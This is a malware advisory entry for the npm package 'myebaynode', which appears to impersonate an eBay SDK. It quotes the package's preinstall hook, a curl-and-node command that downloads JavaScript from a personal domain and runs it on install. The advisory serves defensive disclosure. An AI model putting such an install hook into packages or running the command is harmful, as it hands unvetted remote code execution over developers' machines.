—

MAL-2026-6296

Malicious code in myebaynode (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (12d56c05672731322d45fb9273fb782a6b8042260fb019b2d96c755eed084fc3) package.json declares a preinstall lifecycle hook that runs `curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js`, fetching JavaScript from an external, mutable, personal domain and immediately executing it under the installer's user account on `npm install`. The fetched payload is unpinned (no hash or signature verification), can be changed by the host's owner at any time, and runs with full filesystem and network access of the installing user. The package name 'myebaynode' with description 'Ebay Node Package', version 99.0.0, and minimal metadata (author 'aman', no repository) suggests brand-impersonation intended to lure developers searching for an eBay SDK.

Are you affected?

Enter the version of the package you're using.

Affected packages

npm / myebaynode

No fixed version published yet for myebaynode (npm). Pin to a known-safe version or switch to an alternative.

References

https://www.npmjs.com/package/myebaynode/v/99.0.0 [PACKAGE]